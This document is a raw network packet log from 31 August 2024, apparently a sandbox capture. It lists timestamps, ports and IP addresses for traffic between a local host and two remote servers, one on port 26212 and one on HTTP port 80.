Aug 31, 2024 15:44:17.704714060 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704766989 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704782009 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704791069 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704840899 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704849005 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704905033 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704915047 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704941988 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704982996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704999924 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.705063105 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.705071926 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.705415010 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.709861040 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709871054 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709875107 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709882975 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709891081 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709898949 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709909916 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709919930 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709920883 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.709937096 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709939003 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.709945917 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709954023 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709964037 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709980965 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.709988117 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.709990978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710025072 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710025072 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710037947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710043907 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710062981 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710072041 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710078955 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710099936 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710115910 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710124016 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710133076 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710134029 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710143089 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710150957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710158110 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710175037 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.710180044 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710189104 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710196018 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710203886 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710211992 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710217953 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710261106 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710319996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710359097 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710366964 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710448027 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710457087 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710464001 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710517883 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710527897 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710609913 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710618019 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710634947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710644007 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710660934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710669041 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710731983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710741043 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710803986 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710817099 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710861921 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710935116 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710957050 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710963964 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.710973978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711041927 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711050034 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711059093 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711074114 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711122990 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711131096 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711137056 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.711194038 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.711227894 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711236000 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711262941 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.711270094 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.714818001 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715034008 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715042114 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715277910 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715295076 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715409994 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715418100 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715432882 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715440989 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715545893 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715553999 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715584040 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715637922 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715679884 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715687990 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715780020 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715789080 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715806961 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715816021 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715928078 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715935946 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715943098 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.715997934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716006994 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716016054 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716022968 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716032028 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716039896 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716059923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716068983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716077089 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716092110 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716151953 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716161013 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716245890 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716254950 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716322899 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716331005 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716372967 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716383934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716432095 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716439962 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716587067 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716594934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716602087 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716609001 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716615915 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716686010 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716694117 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716696978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716700077 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716702938 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716789961 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716799021 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716803074 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716805935 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716813087 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716820002 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716922998 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716932058 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716938019 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.716948986 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717044115 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717051029 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717111111 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717118979 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717173100 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717189074 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717303991 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717312098 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717354059 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717361927 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717411995 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717442989 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717475891 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717573881 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717581987 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717588902 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717633963 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717642069 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717693090 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717700958 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717761993 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717770100 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717814922 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717844009 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717875004 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.717890978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718034029 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718041897 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718097925 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718106985 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718193054 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718199968 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.718208075 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.766580105 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.766645908 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.766825914 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.766880035 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.771538019 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771549940 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771569014 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771578074 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771594048 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771601915 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771660089 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771670103 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771678925 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771687031 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771815062 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771821976 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771828890 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771836996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771843910 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771850109 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771881104 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771888971 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771897078 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771903992 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771919966 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771927118 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771934032 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771940947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771948099 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771950960 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771977901 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.771986961 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772015095 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772022009 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772028923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772037029 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772053957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772066116 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772094965 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772103071 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772113085 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772119999 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772159100 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772166014 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772172928 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772224903 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772233009 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772239923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772248030 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772250891 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772350073 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772480011 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772568941 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772651911 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772660017 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772788048 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772797108 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772804022 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772810936 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772830963 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772839069 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772847891 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772897959 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772907019 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772912979 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772921085 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772936106 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772949934 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.772998095 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773005962 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773013115 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773020983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773024082 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773030043 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773096085 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773102999 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773111105 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773122072 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773140907 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773149014 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773205996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773214102 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773232937 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773241043 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773287058 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773294926 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773310900 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773317099 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773351908 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773360014 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773366928 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773412943 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773426056 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773433924 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773449898 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773457050 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773463964 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773500919 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773513079 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773520947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773535013 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773541927 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773581982 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773648024 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773818016 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773827076 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773844957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773853064 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773860931 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.773967981 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.775902987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.775966883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776001930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776040077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776211023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776237011 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.776281118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776295900 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.776323080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776344061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776386976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776421070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776432037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776443005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776453018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776460886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776465893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776489019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776496887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776520014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776738882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776756048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776767015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776778936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776798964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776815891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776825905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776855946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776895046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.776937962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.776998043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777017117 CEST	80	49727	52.212.52.84	192.168.2.5
